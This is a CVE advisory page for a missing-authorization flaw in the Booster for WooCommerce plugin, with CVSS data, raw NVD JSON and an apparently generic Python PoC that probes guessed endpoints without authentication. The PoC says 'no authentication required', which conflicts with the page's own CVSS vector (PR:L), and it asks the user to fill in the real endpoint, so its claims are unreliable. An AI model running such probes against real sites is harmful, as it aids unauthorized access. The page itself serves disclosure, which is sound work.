Security Vulnerability Report
中文
CVE-2025-64379 CVSS 4.3 MEDIUM

CVE-2025-64379

Published: 2025-11-13 10:15:54
Last Modified: 2026-01-20 15:18:58

Description

Missing Authorization vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booster for WooCommerce: from n/a through <= 7.4.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:* - VULNERABLE
Booster for WooCommerce <= 7.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64379 PoC - Missing Authorization in Booster for WooCommerce # Target: WordPress site with Booster for WooCommerce plugin <= 7.4.0 TARGET_URL = "http://target-wordpress-site.com" # Note: This PoC demonstrates unauthorized access to normally protected endpoints # Replace with actual vulnerable endpoint discovered during analysis def exploit_cve_2025_64379(): """ Exploit for Missing Authorization vulnerability in Booster for WooCommerce Attack Vector: Network-based, no authentication required """ # Step 1: Identify vulnerable endpoint # Common Booster endpoints that may lack authorization vulnerable_endpoints = [ "/wp-json/jetpack/v4/", "/wp-json/booster/v1/", "/wp-admin/admin-ajax.php?action=booster_" ] for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-64379-PoC)", "Content-Type": "application/json" } # Step 2: Send unauthenticated request try: response = requests.get(url, headers=headers, timeout=10) # Step 3: Check for successful unauthorized access if response.status_code == 200 and "woocommerce" in response.text.lower(): print(f"[+] Potential vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True elif response.status_code == 200: print(f"[*] Endpoint accessible: {endpoint}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] Manual verification required for specific vulnerable endpoint") return False if __name__ == "__main__": print("CVE-2025-64379 - Booster for WooCommerce Missing Authorization PoC") exploit_cve_2025_64379()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64379", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:53.710", "lastModified": "2026-01-20T15:18:58.180", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Pluggabl Booster for WooCommerce woocommerce-jetpack allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booster for WooCommerce: from n/a through <= 7.4.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:booster:booster_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.5.0", "matchCriteriaId": "8BCBDE94-925D-4C23-88DA-CAC32753B526"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-jetpack/vulnerability/wordpress-booster-for-woocommerce-plugin-7-4-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}